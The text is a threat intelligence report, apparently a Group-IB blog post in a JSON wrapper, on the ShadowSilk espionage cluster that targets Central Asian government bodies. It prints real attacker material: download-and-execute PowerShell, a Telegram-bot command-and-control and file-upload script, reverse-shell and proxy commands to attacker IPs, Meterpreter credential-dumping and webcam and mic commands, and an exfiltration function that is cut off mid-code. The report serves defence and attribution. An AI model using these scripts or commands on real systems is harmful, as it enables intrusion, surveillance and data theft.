{
	"id": "66631071-b450-4eb0-89f0-98f57fe9d809",
	"created_at": "2026-04-06T00:19:24.640316Z",
	"updated_at": "2026-04-10T03:25:25.339761Z",
	"deleted_at": null,
	"sha1_hash": "d9badf5186a32d32b5796f3838d4202bf3ea32ac",
	"title": "ShadowSilk: A Cross-Border Binary Union for Data Exfiltration | Group-IB Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 792583,
	"plain_text": "Nikita Rostovcev\r\nAPAC Technical Head - ASM, TI \u0026\r\nDRP\r\nSergei Turner\r\nCyber Intelligence Analyst, APAC\r\nShadowSilk: A Cross-Border\r\nBinary Union for Data Exfiltration\r\nThis blog describes attacks on victims in Central Asia and APAC. Research into the attack has\r\nidentified a group also called YoroTrooper. We also identified profiles of attackers on hacker forums,\r\ntheir malicious web-panels, test infections of attackers' own machines, and screenshots of attackers'\r\ndesktops.\r\nAugust 27, 2025 · Threat Intelligence\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 1 of 40\n\nAsia Corporate access Dark Web forums Telegram Web-panel YoroTrooper\r\nIntroduction\r\nIn the fall of 2024, Group-IB analysts discovered a series of attacks that targeted government\r\norganizations of countries within the Central Asia and Asia-Pacific region. Group-IB’s initial\r\nassessment revealed that the attacks have been ongoing since 2023 and remain active as of July\r\n2025, based on the activity in the threat actor-controlled infrastructure.\r\nThe toolset and infrastructure overlap with previous campaigns carried out by a group known\r\npublicly as YoroTrooper. Part of this activity was discussed in January 2025 as “Silent Lynx,” which\r\nGroup‑IB tracked and internally designated as ShadowSilk. Subsequent research showed a more\r\nnuanced profile and a larger‑than‑expected campaign with many previously unknown victims,\r\nleading Group‑IB to attribute the expanded activity to a threat cluster codenamed ShadowSilk.\r\nAfter the January disclosure of their activities, ShadowSilk abandoned much of its infrastructure.\r\nHowever, in June 2025 Group‑IB observed renewed activity and new infrastructure, identified\r\nadditional government victims in Central Asia, and collected new IOCs.\r\nIn a joint operation, analysts from Group‑IB and CERT‑KG obtained a key image of the attackers’\r\nserver. 
Analysis uncovered multiple large‑scale attacks, detailed the group’s tactics, techniques, and\r\nprocedures (TTPs), and revealed new information about its composition, working languages,\r\ncountry of origin, and objective in every observed case: data exfiltration.\r\nKey discoveries\r\nGroup-IB Threat Intelligence Portal:\r\nShadowSilk\r\nGroup-IB customers can access our Threat Intelligence portal for more information about\r\nShadowSilk.\r\nShadowSilk has been active since at least 2023, and remains active as of July 2025.\r\nThe group’s primary focus lies in targeting government organizations for the purpose of data\r\nexfiltration.\r\nOver 35 victims, primarily in the government sector of Central Asia, have been identified during\r\nthe course of Group-IB’s analysis.\r\nAnalysis reveals that the group uses infrastructure and tools historically linked to YoroTrooper.\r\nShadowSilk consists of two sub-groups and has Chinese- and Russian-speaking operators. The\r\nexact depth and nature of the cooperation between these two sub-groups remains uncertain as of the\r\npublishing of this research.\r\nShadowSilk uses a diverse toolkit which includes public exploits, penetration-testing tools, and\r\nweb panels for managing infected devices. The panels are known to have been acquired via\r\ndark web forums.\r\nAt some point, a fraction of the data known to be in ShadowSilk’s possession, which had never\r\npreviously appeared in public, was put up for sale on one of the dark web forums.\r\nFigure 1. 
ShadowSilk’s campaign largely focuses on countries and critical industries within Asia.\r\nTracing the Attacks to YoroTrooper – And\r\nWhy It Might Be Just the Beginning\r\nDuring the course of Group-IB’s investigation into the attacks conducted by ShadowSilk, we\r\nidentified PowerShell code (below) that downloads payloads from https://tpp[.]tj/BossMaster.txt and\r\nhttps://tpp[.]tj/iap.txt.\r\npowershell -c \"(Invoke-WebRequest https://tpp.tj/BossMaster.txt | iex\" REG ADD\r\n HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsTaskPath /t\r\n REG_SZ /d 'powershell -ExecutionPolicy Bypass -command \"\r\n(iwr https://tpp.tj/iap.txt).Content | iex\"' /f /run reg query HKCU\\SOFTWARE\\Microsoft\\Win\r\nThese same URLs were previously mentioned by Cisco researchers in their report about\r\nYoroTrooper. Notably, tpp[.]tj is the compromised legitimate website of a Tajikistan government\r\nagency.\r\nIn addition, we discovered a file named /www/html/gramm.ps1 on the ShadowSilk group’s server,\r\ncontaining the following code — the same script referenced in the previously mentioned research\r\non YoroTrooper.\r\n$Token=\"{redacted}\"\r\n$URL=\"https://api.telegram.org/bot{0}\" -f $Token\r\n$lastID = {redacted}\r\nwhile ($true) {\r\n # Read messages\r\n $inMessage=Invoke-RestMethod -Method Get -Uri ($URL +'/getUpdates?offset=' + ($lastID\r\n $inMessage.result | ForEach-Object {\r\n $updateid = $_.update_id\r\n $from = $_.message.from.id\r\n $command = $_.message.text\r\n $OFS=''\r\n # For executing commands in cmd\r\n if([string]$command[0..3] -eq \"/cmd\"){\r\n $command = [string]$command[5..$command.Length]\r\n $result = Invoke-Expression($command)\r\n $res = \"\"\r\n $result | ForEach-Object {$res += [string]$_ + \"%0D%0A\"}\r\n if($res -eq \"\"){\r\n $lastID = $updateid\r\n continue\r\n }\r\n if($res.Length -gt 4095){\r\n for ($i = 0; $i -lt $res.Length / 4095; $i++) 
{\r\n $begin = $i * 4095\r\n $end = $begin + 4094\r\n if($end -gt $res.Length){\r\n $end = $res.Length\r\n }\r\n $data = \"chat_id=$from\u0026text=\" + $res[$begin..$end]\r\n $URI = \"$URL/sendMessage?$data\"\r\n Invoke-WebRequest -Uri $URI \u003e $null\r\n }\r\n } else {\r\n $data = \"chat_id=$from\u0026text=$res\"\r\n $URI = \"$URL/sendMessage?$data\"\r\n Invoke-WebRequest -Uri $URI \u003e $null\r\n }\r\n \r\n }\r\n # For downloading files\r\n if([string]$command[0..8] -eq \"/download\"){\r\n Write-Host $command\r\n $FilePath = [string]$command[10..$command.Length]\r\n $FieldName = 'document'\r\n Write-Host $FilePath\r\n Write-Host (Split-Path -leaf $FilePath)\r\n Add-type -AssemblyName System.Net.Http\r\n $httpClientHandler = New-Object System.Net.Http.HttpClientHandler\r\n $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler\r\n $FileStream = [System.IO.FileStream]::new($FilePath, [System.IO.FileMode]::Ope\r\n $FileHeader = [System.Net.Http.Headers.ContentDispositionHeaderValue]::new('fo\r\n $FileHeader.Name = $FieldName\r\n $FileHeader.FileName = (Split-Path $FilePath -leaf)\r\n $FileContent = [System.Net.Http.StreamContent]::new($FileStream)\r\n $FileContent.Headers.ContentDisposition = $FileHeader\r\n $FileContent.Headers.ContentType = [System.Web.MimeMapping]::GetMimeMapping($F\r\n \r\n $MultipartContent = [System.Net.Http.MultipartFormDataContent]::new()\r\n $MultipartContent.Add($FileContent)\r\n \r\n $httpClient.PostAsync(\"$URL/sendDocument?chat_id=$from\", $MultipartContent) \u003e\r\n }\r\n $lastID = $updateid\r\n }\r\n Start-Sleep 2\r\n}\r\nFigure 2. 
The contents of the file /www/html/gramm.ps1.\r\nSource: Cisco Talos\r\nThe Russian Connection\r\nAnalysis of the attackers’ server image also showed that the attackers use the Russian keyboard\r\nlayout and sometimes make typos when entering commands, such as entering a command using the\r\nRussian layout:\r\nыскуут -ды ==\u003e screen -ls\r\n/дшые ==\u003e /list\r\nWe also observed a lot of activity that indicated that the attackers were testing malware capabilities\r\non their own devices. For example, the attackers launched a Cobalt Strike Beacon on one of their\r\ndevices:\r\n 07/24 06:11:07 UTC [metadata] [redacted] \u003c- 10.0.20.123; computer: DESKTOP-FBQVC35; user\r\n07/24 06:11:19 UTC [input] sleep 0\r\n07/24 06:11:19 UTC [task] Tasked beacon to become interactive\r\n07/24 06:11:44 UTC [checkin] host called home, sent: 16 bytes\r\n07/24 06:12:23 UTC [input] зцв\r\n07/24 06:12:23 UTC [error] Unknown command: зцв\r\n07/24 06:12:25 UTC [input] pwd\r\n07/24 06:12:25 UTC [task] \u003c\u003e Tasked beacon to print working directory\r\n07/24 06:12:25 UTC [checkin] host called home, sent: 8 bytes\r\n07/24 06:12:26 UTC [output]\r\nCurrent directory is C:\\Users\\redacted\\Desktop\\tmp\r\n07/24 06:12:27 UTC [input] cd ..\r\n07/24 06:12:27 UTC [task] \u003c\u003e cd ..\r\n07/24 06:12:27 UTC [checkin] host called home, sent: 10 bytes\r\n07/24 06:12:30 UTC [input] cd tools\r\n07/24 06:12:30 UTC [task] \u003c\u003e cd tools\r\n07/24 06:12:30 UTC [checkin] host called home, sent: 13 bytes\r\n07/24 06:12:34 UTC [input] dir\r\n07/24 06:12:34 UTC [error] Unknown command: dir\r\n07/24 06:12:36 UTC [input] ls\r\n07/24 06:12:36 UTC [task] \u003c\u003e Tasked beacon to list files in .\r\n07/24 06:12:36 UTC [checkin] host called home, sent: 19 bytes\r\n07/24 06:12:37 UTC [output]\r\nC:\\Users\\redacted\\Desktop\\tools\\*\r\nD 0 07/24/2024 10:47:22 .\r\nD 0 07/22/2024 13:34:09 ..\r\nD 0 07/22/2024 15:22:25 
ADSearch\r\nD 0 09/13/2023 10:17:26 DebugAmsi\r\nD 0 09/13/2023 10:17:27 decompiler-explorer\r\nD 0 02/19/2024 16:40:52 donut\r\nD 0 04/18/2024 16:00:48 Dumpert\r\nD 0 04/18/2024 13:25:18 DuplicateDump\r\nD 0 10/30/2023 10:10:21 Exchange\r\nD 0 09/13/2023 10:17:27 FilelessRemotePE\r\nD 0 03/13/2024 11:17:41 how-does-MobaXterm-encrypt-password\r\nD 0 02/19/2024 17:36:33 il-repack\r\nF 126423 04/20/2024 11:15:34 Inveigh-net3.5-v2.0.10.zip\r\nF 303194 04/22/2024 09:13:27 Inveigh.ps1\r\nD 0 04/18/2024 12:11:06 lsa-whisperer\r\nD 0 09/13/2023 10:17:31 Met\r\nD 0 04/18/2024 13:22:24 MirrorDump\r\nD 0 07/22/2024 09:30:09 ncat-portable-5.59BETA1\r\nD 0 09/13/2023 10:17:33 Neo-reGeorg\r\nF 24938216 07/28/2023 23:23:53 ngrok.exe\r\nD 0 04/18/2024 14:52:31 operapass\r\nD 0 09/13/2023 10:17:35 pe2shellcode\r\nF 10730 07/24/2024 10:47:33 PortScan.ps1\r\nF 770279 07/22/2024 14:51:56 PowerView.ps1\r\nD 0 05/27/2024 15:14:18 resocks\r\nD 0 02/15/2024 09:51:08 ReverseSocks5\r\nF 2121159 05/28/2024 16:42:02 ReverseSocks5.rar\r\nD 0 09/13/2023 10:17:38 Seatbelt\r\nD 0 04/30/2024 11:09:12 SharpChromium\r\nD 0 04/26/2024 10:53:13 SharpDPAPI\r\nD 0 09/13/2023 10:17:43 SharpDXWebcam\r\nD 0 09/13/2023 10:17:43 SharPersist\r\nD 0 07/22/2024 13:32:38 SharpHound\r\nD 0 09/13/2023 10:17:45 SharpUp\r\nD 0 09/13/2023 10:17:48 SharpView\r\nD 0 09/13/2023 10:17:51 socat\r\nF 36 07/05/2024 09:12:49 test.php\r\nD 0 02/19/2024 10:57:19 ThreatCheck\r\nD 0 04/18/2024 11:06:41 UACME\r\nD 0 03/15/2024 13:05:08 webcam\r\nD 0 03/13/2024 11:37:33 XMCredentialsDecryptor\r\n07/24 06:13:12 UTC [input] shell powershell -F PortScan.ps1 -ComputerName localhost\r\n07/24 06:13:12 UTC [task] Tasked beacon to run: powershell -F PortScan.ps1 -ComputerName\r\n07/24 06:13:12 UTC [checkin] host called home, sent: 81 bytes\r\n07/24 06:13:13 UTC [output]\r\nreceived output:\r\nFile C:\\Users\\redacted\\Desktop\\Tools\\PortScan.ps1 cannot be loaded because 
running scripts\r\nFor more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?Link\r\n + CategoryInfo : SecurityError: (:) [], ParentContainsErrorRecordException\r\n + FullyQualifiedErrorId : UnauthorizedAccess\r\n07/24 06:13:24 UTC [input] shell powershell -ep bypass -F PortScan.ps1 -ComputerName loca\r\n07/24 06:13:24 UTC [task] Tasked beacon to run: powershell -ep bypass -F PortScan.ps1 -Co\r\n07/24 06:13:24 UTC [checkin] host called home, sent: 92 bytes\r\n07/24 06:13:35 UTC [output]\r\nreceived output:\r\nWARNING: No port-file to assign service with port found! Execute the script \"Create-PortLi\r\nthe latest version.. This warning doesn affect the scanning procedure.\r\nWe analyzed the accounts of the attackers in Telegram groups, as well as darknet forums, and\r\nconcluded that the operators of the YoroTrooper group are fluent in Russian and use it as their\r\nnative language. Our assessment indicates that the Russian-speaking YoroTrooper operators are engaged in the\r\ndevelopment of malware and in conducting attacks to gain initial access.\r\nChinese Comrades\r\nThe next important discovery was a set of screenshots that captured the attackers’ workstations,\r\noperators, and other revealing details.\r\nLet’s start with screenshots of the attackers’ workstations:\r\nFigure 3. A screenshot of the attackers’ workstation with an opened article about PrintNightmare\r\n(CVE-2021-34527).\r\nFigure 4. A screenshot of the attackers’ workstation showing a repository of a Python implementation\r\nof PrintNightmare, and a running Struts2VulsTools, a Chinese-language vulnerability scanner.\r\nFigure 5. 
A screenshot of the attackers’ workstation showing an open gov website of the Kyrgyz\r\nRepublic\r\nBased on the above screenshots, the environment – such as visited pages, the active keyboard\r\nlayout, and automatic translation of websites into Chinese – indicates that the device likely belongs\r\nto a Chinese-speaking operator. This discovery introduces a new Chinese-language dimension into\r\nour investigation. The data from the screenshots also allowed us to identify additional tools, as well\r\nas a connection with YoroTrooper.\r\nNew Campaign Activity Linked to Chinese-Language Operators: Jan\r\n2025 to Present\r\nSimilarly, in the recently discovered ShadowSilk’s campaign (January-June 2025), compromised\r\nmachines that contained what appears to be mail server dumps from two government entities of\r\ndifferent countries were configured with a Chinese locale:\r\n OS 名称: Microsoft Windows 10 专业版\r\nOS 版本: 10.0.19045 暂缺 Build 19045\r\nOS 制造商: Microsoft Corporation\r\nOS 配置: 独立工作站\r\nOS 构建类型: Multiprocessor Free\r\n注册的所有人: David\r\n注册的组织:\r\n产品 ID: 00331-10000-00001-AA573\r\n初始安装日期: 2023/11/1, 下午 03:52:36\r\n系统启动时间: 2025/1/15, 下午 05:19:30\r\n系统制造商: VMware, Inc.\r\n系统型号: VMware7,1\r\n系统类型: x64-based PC\r\n处理器: 安装了 1 个处理器。\r\n [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~3000 Mhz\r\nBIOS 版本: VMware, Inc. VMW71.00V.16722896.B64.2008100651, 2020/8/10\r\nThe specific machine is believed to be used for data exfiltration by the threat actors.\r\nAs mentioned earlier, following the discovery and exposure of some of the group’s infrastructure in\r\nlate January 2025, ShadowSilk abandoned a significant part of it. However, in June 2025, Group-IB\r\ndiscovered new Telegram bots attributed to ShadowSilk with high confidence. 
One of the bots was\r\ncreated on 30 January, one week after their previous bots were exposed.\r\nThe newly discovered campaign bears procedural and operational similarities with the previously\r\nidentified ShadowSilk’s campaign:\r\nUsage of Telegram bots to communicate with infected machines;\r\nPowerShell commands sent via Telegram bots;\r\nCommands for bot-machine interaction have been slightly modified, but strong similarities\r\nremain.\r\nThe following is the PowerShell script from ShadowSilk’s earlier campaign that was previously\r\ndiscovered:\r\n /XXXXX cmd /c curl -o c:\\users\\public\\rev.exe hxxps://pweobmxdlboi[.]com/sokcs.exe\r\nThe following is the PowerShell script from ShadowSilk’s new, and ongoing, campaign:\r\n /goXXX cmd /c curl -o C:\\users\\user\\appdata\\local\\spoolsvc.rar hxxps://sss[.]qwadx[.]com/\r\nOne of the attackers’ IP addresses remained unchanged across the two campaigns, enabling us\r\nto link them together.\r\nThe attacker’s IP address used for the new and ongoing campaign:\r\nID XXXX:\r\nRequesting URL: hxxp://141[.]98[.]82[.]198:443/note.txt\r\nThe attackers’ IP address that was used in the previously discovered campaign:\r\n[XXXXX]\r\nRequesting URL: http://141[.]98[.]82[.]198:8080/note.txt\r\nShadowSilk also made slight modifications to executable file names:\r\n /XXXXX C:\\users\\public\\rev.exe -connect 65[.]38[.]120[.]38:443\r\n/goXXXX C:\\users\\public\\libraries\\revv2.exe -connect 94[.]232[.]249[.]239:443\r\nBased on the creation dates of the newly discovered bots, the campaign began in late January\r\n2025, and remains active at the time of writing.\r\nCommonalities Between the Two Groups\r\nAnalysis of desktop screenshots revealed identical victims between the two subgroups. 
Group-IB\r\nresearchers identified a network of infections in Uzbek organizations based on data from\r\nYoroTrooper’s malware. The same victims were also found in screenshots associated with a Chinese-speaking operator, but in the context of network penetration and internal reconnaissance.\r\nFigure 6. A screenshot of ShadowSilk’s reconnaissance notes with Chinese characters.\r\nFigure 7. A screenshot of the attacker’s machine, displaying the Godzilla Webshell.\r\nThe most attentive readers will have noticed the username “mai”. Here is a list of the file paths we\r\nfound on the server that contain this username:\r\n C:\\Users\\mai\\Desktop\\Penetration-Tools\\WebShellTools\\Behinder_v4.0.6\\更新日志.txt\r\nC:\\Users\\mai\\Desktop\\BackupTools\\VpnNode\\0416\\节点.txt\r\nC:\\Users\\mai\\Project\\mm\\[redacted].txt\r\nC:\\Users\\mai\\Project\\mm\\[redacted].txt\r\nC:\\Users\\mai\\Project\\mm\\[redacted].txt\r\nC:\\Users\\mai\\Project\\mm\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\InnerNetwork\\Fscan\\targets.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\[redacted]\\notes.txt\r\nC:\\Users\\mai\\Desktop\\BackupTools\\v2rayN-Core\\guiLogs\\2023-07-17.txt\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\WebShellTools\\godzilla\\test.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\pk\\202-129.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\pk\\notes.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\pk\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\pk\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\pk\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\[redacted].txt\r\nC:\\Users\\mai\\Downloads\\WordPress RCE 
POC\\urls.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\10.190.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\192.168.txt\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\WebShellTools\\godzilla\\zxcvb.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\10.10.10.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\[redacted]\\ad_users.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\[redacted]\\ad_machines.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\[redacted]\\notes.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\mm\\notes.txt\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\Exchange\\SharpExchangeKing.2023-07-21.v2.4.3\\owadat\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\Exchange\\SharpExchangeKing.2023-07-21.v2.4.3\\ssa_po\r\nC:\\Users\\mai\\Desktop\\test.txt\r\nC:\\Users\\mai\\Downloads\\addssp\\readme.txt\r\nC:\\Users\\mai\\Desktop\\result.txt\r\nC:\\Users\\mai\\Desktop\\encode.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\za\\[redacted].txt\r\nC:\\Users\\mai\\.3T\\log.txt\r\nC:\\Users\\mai\\.zenmap\\target_list.txt\r\nC:\\Users\\mai\\Downloads\\consullocnew-master\\consullocnew-master\\1.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\10.0.0.0.txt\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\Shiro\\shirokeys.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\[redacted]\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\ehole\\EHole_windows_amd64\\targets.txt\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\URLFinder\\1.txt\r\nC:\\Users\\mai\\Downloads\\V1.0.20210322\\服务端脚本说明.txt\r\nC:\\Users\\mai\\Downloads\\V1.0.20210322\\更新说明.txt\r\nC:\\Users\\mai\\Desktop\\sms.txt\r\nAs the file paths above show, the user “mai” uses utilities such as:\r\n 
WebShellTools\\godzilla\r\nWebShellTools\\Behinder_v4.0.6\r\nBackupTools\\v2rayN-Core\r\nInnerNetwork\\Fscan\r\nPenetration-Tools\\Fofa_View\\fofaviewer.jar\r\nShadowSilk’s Arsenal – Toolset and Exploits\r\nShadowSilk uses a wide range of tools and exploits, including:\r\nVulnerabilities: CVE-2018-7600, CVE-2018-7602, CVE-2024-27956\r\nWeb application attack tools: sqlmap, wpscan\r\nReconnaissance tools: FOFA, Shodan, fscan, gobuster, dirsearch\r\nIntrusion and control tools: Metasploit, Cobalt Strike, custom applications and scripts for\r\ngaining access based on Telegram bots, proxy utilities such as resocks, proxifier, chisel, rsocx.\r\nChinese utilities: Antsword, Godzilla webshell, WeblogicTool, FinalShell and SNETCracker; also HTTP-Reverse-Shell and Drupalgeddon2.\r\nControl panels for infected devices: JRAT and MORF Project, purchased on darknet platforms.\r\nWhile analyzing an image of the attackers’ server, Group-IB researchers discovered a directory\r\ncalled “rat”, which contained the following directories:\r\n└─$ ll rat\r\nmorf_server\r\nweb-panel\r\nweb-panel---shell\r\nHaving analyzed these directories, we found that they contain code for web panels for managing\r\nbots (infected devices).\r\nWeb-panel---shell: Panel JLIB\r\nThis panel has the following login form:\r\nFigure 8. A screenshot of the login form to the JRAT control panel.\r\nAfter logging in with valid credentials, the web panel displays a list of bots from the internal\r\ndatabase, regardless of their current activity status. The screenshot shows a single infection, which\r\nappears to be a test instance used by the attackers.\r\nFigure 9. 
A screenshot of the admin panel of JRAT.\r\nThis panel allows the attackers to upload files to the infected devices, as well as to execute\r\nmalicious code on them.\r\nWeb Panel: Morf Project\r\nThe next directory “Web-panel” contains another panel, which is different in style, but also allows\r\nattackers to execute commands and upload malicious files to infected devices.\r\nFigure 10. A screenshot of the “Morf Project” login panel, found within the “Web-panel” directory.\r\nFigure 11. A screenshot of the “Morf Project” web interface.\r\nMorf_server\r\nThis directory does not contain the web panel, but serves as an intermediate server between the\r\nweb panel and the infected device. It enables operators to receive connections from bots and\r\ntransmit the data to the attackers’ malware panel, thereby reducing the likelihood of this panel being\r\ndetected by researchers.\r\nFigure 12. A screenshot of the Morf_server application code.\r\nIt is noteworthy that none of the panels have the ability to create malicious files. 
In addition, Group-IB researchers discovered that these panels were not developed by the attackers themselves, but\r\nwere instead purchased from other users on the XSS underground forum.\r\nTactics, Techniques and Procedures\r\nReconnaissance\r\nDuring the reconnaissance phase, the attackers used public tools like Shodan and FOFA to gather\r\ndata on targets of interest:\r\nshodan search \"org:.gov wordpress country:tr\"\r\nshodan search \"org:.gov country:tr\"\r\nshodan search \"org:gov country:tr\"\r\nshodan search \"hostname:gov country:tr\"\r\nshodan count \"hostname:gov country:tr\"\r\nshodan count \"hostname:gov wordpress and country:tr\"\r\nshodan count \"hostname:gov wordpress country:tr\"\r\nshodan search \"hostname:gov wordpress country:tr\"\r\nshodan search \"hostname:gov http.title:Wordpress country:tr\"\r\nshodan search 'hostname:gov http.title:\"Wordpress\" country:tr'\r\nResource Development\r\nThe attackers created and used Telegram bots as a command-and-control (C2) center, leveraging\r\nthem to issue commands, exfiltrate confidential data, update malware modules, and disguise traffic\r\nas legitimate messenger activity.\r\nThis is made possible because many of Telegram’s features—though entirely legitimate—are well\r\nsuited for command-and-control and data exfiltration tasks. For example, the Open Bot API and\r\naccess tokens allow anyone to create a bot within a minute and control it via HTTPS/MTProto. As\r\nfar as external observers are concerned, the resulting traffic appears as a regular request to\r\nTelegram.\r\nThis approach allows attackers to bypass traditional monitoring tools, and speeds up the execution\r\nof attack operations. 
The attackers also created the domains that were used in the attacks.\r\nInitial Access\r\nFor initial access, the attackers used phishing emails designed to lure their victims into opening a\r\npassword-protected archive, and running the executable contained within.\r\nFigure 13. A screenshot of a phishing email from ShadowSilk.\r\nAs soon as the victim launches the binary, their device will be infected with malware that uses\r\nTelegram as its command-and-control channel. This allows the attackers to remotely execute\r\ncommands and receive their execution results in real-time.\r\nExecution\r\nAfter gaining access to infected hosts via the Telegram malware, the attackers download and launch\r\nadditional malicious programs using the same channel.\r\n/73640 cmd /c curl -o c:\\users\\public\\music\\147.exe hxxps://document[.]hometowncity[.]clou\r\n/73640 start c:\\users\\public\\music\\147.exe\r\n/73640 cmd /c c:\\users\\public\\music\\147.exe\r\n/26450 cmd /c curl -o c:\\users\\public\\gservice.exe hxxps://document[.]webmailsession[.]com\r\n/26450 cmd /c start c:\\users\\public\\gservice.exe\r\nPersistence\r\nTo maintain persistence, the attackers deploy additional malicious tools and modify the Windows\r\nregistry to ensure their binaries execute automatically at system startup.\r\n/26450 REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v UpdateSoft /t REG_SZ\r\n[26450]\r\nОперация успешно завершена. [Translation: The operation was completed successfully.]\r\n/cmd REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v UpdateSoftWar /t REG_SZ\r\n[13456]\r\nОперация успешно завершена. [Translation: The operation was completed successfully.]\r\n/26450 REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WinUpTask /t REG_SZ /\r\n[26450]\r\nОперация успешно завершена. [Translation: The operation was 
completed successfully.]\r\nPrivilege Escalation\r\nThe attackers use the utility available at hxxps://github[.]com/peass-ng/PEASS-ng to identify\r\npersistence mechanisms, saved passwords in configuration files, and explore other ways of\r\nincreasing their existing privileges.\r\nCredential Access\r\nThe attackers use a custom tool – allegedly bought on a dark web forum – that steals Chrome\r\npassword storage files, along with the decryption key located at\r\n“AppData\\Local\\Google\\Chrome\\User Data\\Local State” to decrypt these stores. In addition, the\r\nattackers use the directory listing on the victims’ devices to find files that are of interest to them. For\r\nexample, the attackers downloaded .txt and .xlsx files containing passwords for web services of\r\ntheir victims.\r\nDiscovery\r\nFor internal reconnaissance purposes, the attackers used the fscan utility.\r\nIn addition, having gained access to the victims’ devices through the Telegram malware, the\r\nattackers execute commands such as dir, ipconfig, whoami and systeminfo. The\r\nattackers also used Meterpreter in their attacks and executed commands such as:\r\nexecute -H -f reg -a \"add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\r\nexecute -H -f reg -a \"add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\r\nexecute -H -f reg -a \"query HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDiges\r\nThese commands interact with the Windows Registry, specifically modifying or querying the\r\nUseLogonCredential value in the WDigest authentication settings. One of the commands enables\r\nWDigest authentication, which can be a security risk since it allows credentials to be stored in\r\nmemory in plaintext. 
Another command checks whether UseLogonCredential is set and returns its\r\nvalue: a value of 1 indicates WDigest is enabled, while 0 or absence of the key means it is disabled.\r\nThe threat actors also used several more features from the Meterpreter session:\r\nwifi_list\r\ngetproxy\r\nCollection\r\nThe attackers use the built-in features of Cobalt Strike and Metasploit to capture screenshots as\r\nwell as webcam pictures and internal microphone recordings:\r\nscreenshot\r\nwebcam_snap -h\r\nwebcam_snap -q 100\r\nscreenshot -q 100\r\nrecord_mic -h\r\nrecord_mic -d 12 -f 19.wav\r\nwebcam_list\r\nIt has also been observed that the attackers were using the built-in kiwi utility in a Meterpreter\r\nsession as well as some other built-in features:\r\nload kiwi\r\nkiwi_cmd\r\nkiwi_cmd dpapi::cred\r\ncreds_livessp\r\ncreds_msv\r\ncreds_ssp\r\ncreds_tspkg\r\nlsa_dump_secrets\r\nlsa_dump_sam\r\ncat .bash_history\r\ncat /etc/shadow\r\ncat /home/cert/requestPassword.txt\r\nCommand and Control\r\nAs previously mentioned, the attackers use Telegram-based malware alongside Cobalt Strike and\r\nMetasploit, employing these tools as C2 infrastructure. Furthermore, the attackers downloaded\r\nreverse proxy tools such as rsocx, chisel and resocks onto the compromised devices:\r\nexecute -H -f rsocx.exe -a \"-r 179[.]60[.]150[.]151:8000\"\r\n./resocks listen -h\r\n./resocks listen --on '179[.]60[.]150[.]151:443' -p \"179[.]60[.]150[.]151:1099\" -k pppqweo\r\n./resocks listen --on '179[.]60[.]150[.]151:443' -p \"179[.]60[.]150[.]151:1099\" -k aaaabbb\r\n./chisel server -p 1066 --reverse\r\n./chisel server -h -p 1066 --reverse\r\n./chisel server --host 179[.]60[.]150[.]150 -p 1066 --reverse\r\nExfiltration\r\nThe threat actors then launch obfuscated PowerShell code on a compromised device, which looks like the\r\nfollowing after decoding:\r\nfunction MyBackup {\r\n param (\r\n [string]$arch,\r\n [string]$volume,\r\n [datetime]$date,\r\n [Int]$days\r\n )\r\n Add-Type -AssemblyName 'System.IO.Compression.FileSystem'\r\n $zipname = \"$arch.zip\"\r\n $list_extension = @('.zip', '.doc', '.docx', '.xls', '.xlsx', '.pdf', '.txt')\r\n $volume +=\":\\\"\r\n if ($volume -eq \"C:\\\") {\r\n $volume = \"C:\\Users\\\"\r\n }\r\n $path = \"C:\\Users\\Public\\Pictures\\Test\"\r\n if (-Not (Test-Path -Path $path)) {\r\n $null = New-Item -path $path -ItemType D\r\n }\r\n \r\n Get-ChildItem -Path $volume -Recurse -File | ForEach-Object {\r\n $file = $_\r\n $ext = $file.Extension.ToLower()\r\n try {\r\n $fileDate = $file.LastWriteTime\r\n if (($date - $fileDate).Days -le $days -and $file.FullName -ne \"$arch.zip\" -a\r\n ((Split-Path -Parent $file.FullName) -notlike \"$path*\")) {\r\n $relativePath = $file.FullName\r\n $dest = 